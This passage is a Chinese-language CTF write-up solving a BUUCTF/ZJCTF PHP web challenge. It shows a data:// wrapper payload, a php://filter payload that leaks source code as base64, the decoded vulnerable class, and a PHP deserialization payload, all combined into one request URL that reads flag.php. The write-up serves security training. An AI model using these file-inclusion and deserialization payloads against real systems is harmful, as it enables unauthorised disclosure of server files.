<p>按照顺序一个一个来<br>首先是第一个，可知需要传递一个参数并且是做为一个文件进行读取，内容为<code>welcome to the zjctf</code>，于是可构造payload为：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">text=data://filter/text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=</span><br></pre></td></tr></table></figure>
<p>第二个没看出解决办法，但是源码中提示了一个<code>useless.php</code>十分扎眼，直接访问没有东西，于是祭出老办法，通过php://filter将源码以base64形式读取：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">file=php://filter/read=convert.base64-encode/resource=useless.php</span><br></pre></td></tr></table></figure>
<p>得到源码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">PD9waHAgIAoKY2xhc3MgRmxhZ3sgIC8vZmxhZy5waHAgIAogICAgcHVibGljICRmaWxlOyAgCiAgICBwdWJsaWMgZnVuY3Rpb24gX190b3N0cmluZygpeyAgCiAgICAgICAgaWYoaXNzZXQoJHRoaXMtPmZpbGUpKXsgIAogICAgICAgICAgICBlY2hvIGZpbGVfZ2V0X2NvbnRlbnRzKCR0aGlzLT5maWxlKTsgCiAgICAgICAgICAgIGVjaG8gIjxicj4iOwogICAgICAgIHJldHVybiAoIlUgUiBTTyBDTE9TRSAhLy8vQ09NRSBPTiBQTFoiKTsKICAgICAgICB9ICAKICAgIH0gIAp9ICAKPz4gIAo&#x3D;</span><br></pre></td></tr></table></figure>
<p>进行解密可得</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span>  </span><br><span class="line"></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Flag</span></span>&#123;  <span class="comment">//flag.php  </span></span><br><span class="line">    <span class="keyword">public</span> <span class="variable">$file</span>;  </span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">__tostring</span>(<span class="params"></span>)</span>&#123;  </span><br><span class="line">        <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="keyword">$this</span>-&gt;file))&#123;  </span><br><span class="line">            <span class="keyword">echo</span> file_get_contents(<span class="keyword">$this</span>-&gt;file); </span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line">        <span class="keyword">return</span> (<span class="string">&quot;U R SO CLOSE !///COME ON PLZ&quot;</span>);</span><br><span class="line">        &#125;  </span><br><span class="line">    &#125;  </span><br><span class="line">&#125;  </span><br><span class="line"><span class="meta">?&gt;</span>  </span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>根据<code>反序列化</code>和<code>useless.php</code>源码尝试构建反序列化payload：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">password=O:<span class="number">4</span>:<span class="string">&quot;FLAG&quot;</span>:<span class="number">1</span>:&#123;s:<span class="number">4</span>:<span class="string">&quot;file&quot;</span>;s:<span class="number">8</span>:<span class="string">&quot;flag.php&quot;</span>;&#125;</span><br></pre></td></tr></table></figure>
<p>整体payload为：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http://url/?text=data://filter/text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&amp;</span><br><span class="line">file=php://filter/read=convert.base64-encode/resource=useless.php&amp;</span><br><span class="line">password=O:4:&quot;FLAG&quot;:1:&#123;s:4:&quot;file&quot;;s:8:&quot;flag.php&quot;;&#125;</span><br></pre></td></tr></table></figure>
<p>得到结果：<br><img src="https://img-blog.csdnimg.cn/202009230130042.png#pic_center" alt="在这里插入图片描述"><br>查看源码即可获得FLAG</p>
<p>DONE</p>
</div></article><div class="post-copyright"><div class="post-copyright__author"><span class="post-copyright-meta">文章作者: </span><span class="post-copyright-info"><a href="mailto:undefined">MOZac Connecter</a></span></div><div class="post-copyright__type"><span class="post-copyright-meta">文章链接: </span><span class="post-copyright-info"><a href="https://mozac-void.yixiangtang.icu/2020/08/07/MOZac-BUUCTF-WP/">https://mozac-void.yixiangtang.icu/2020/08/07/MOZac-BUUCTF-WP/</a></span></div><div class="post-copyright__notice"><span class="post-copyright-meta">版权声明: </span><span class="post-copyright-info">本博客所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/">CC BY-NC-SA 4.0</a> 许可协议。转载请注明来自 <a href="https://mozac-void.yixiangtang.icu">MOZac的小屋</a>！</span></div></div><div class="post-meta__tag-list"><a class="post-meta__tags" href="/tags/web/">web</a><a class="post-meta__tags" href="/tags/misc/">misc</a><a class="post-meta__tags" href="/tags/crypto/">crypto</a><a class="post-meta__tags" href="/tags/real/">real</a><a class="post-meta__tags" href="/tags/ctf/">ctf</a><a class="post-meta__tags" href="/tags/wp/">wp</a></div><div class="social-share pull-right" data-disabled="facebook"></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/css/share.min.css"><script src="https://cdn.jsdelivr.net/npm/social-share.js@1.0.16/dist/js/social-share.min.js"></script><nav id="pagination"><div class="prev-post pull-left"><a href="/2020/10/03/Web-Upload-1/"><i class="fa fa-chevron-left">  </i><span>WEB Upload</span></a></div><div class="next-post pull-right"><a href="/2020/08/07/My-Note/"><span>My Note</span><i class="fa fa-chevron-right"></i></a></div></nav><div class="post-adv"><iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=728 height=110 src="//music.163.com/outchain/player?type=0&id=2110349418&auto=1&height=90"></iframe></div><div id="lv-container" data-id="city" data-uid="MTAyMC81MjI0My8yODcyMg=="><script>(function(d, s) {
    var j, e = d.getElementsByTagName(s)[0];
    if (typeof LivereTower === 'function') { return; }
    j = d.createElement(s);
    j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
    j.async = true;
    e.parentNode.insertBefore(j, e);
})(document, 'script');</script></div></div></div><footer><div class="layout" id="footer"><div class="copyright">&copy;2019 - 2021 By MOZac Connecter</div><div class="framework-info"><span>驱动 - </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span class="footer-separator">|</span><span>主题 - </span><a target="_blank" rel="noopener" href="https://github.com/Molunerfinn/hexo-theme-melody"><span>Melody</span></a></div><div class="icp"><a><span>鲁ICP备2020049110号</span></a></div><div class="busuanzi"><script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script><span id="busuanzi_container_page_pv"><i class="fa fa-file"></i><span id="busuanzi_value_page_pv"></span><span></span></span></div></div></footer><i class="fa fa-arrow-up" id="go-up" aria-hidden="true"></i><script src="https://cdn.jsdelivr.net/npm/animejs@latest/anime.min.js"></script><script src="https://cdn.jsdelivr.net/npm/jquery@latest/dist/jquery.min.js"></script><script src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@latest/dist/jquery.fancybox.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-animate@latest/velocity.min.js"></script><script src="https://cdn.jsdelivr.net/npm/velocity-ui-pack@latest/velocity.ui.min.js"></script><script src="/js/utils.js?version=1.9.0"></script><script src="/js/fancybox.js?version=1.9.0"></script><script src="/js/sidebar.js?version=1.9.0"></script><script src="/js/copy.js?version=1.9.0"></script><script src="/js/fireworks.js?version=1.9.0"></script><script src="/js/transition.js?version=1.9.0"></script><script src="/js/scroll.js?version=1.9.0"></script><script src="/js/head.js?version=1.9.0"></script><script id="ribbon" src="/js/third-party/canvas-ribbon.js" size="150" alpha="0.6" zIndex="-1" data-click="false"></script><script>if(/Android|webOS|iPhone|iPod|iPad|BlackBerry/i.test(navigator.userAgent)) {
  $('#nav').addClass('is-mobile')
  $('footer').addClass('is-mobile')
  $('#top-container').addClass('is-mobile')
}</script></body></html>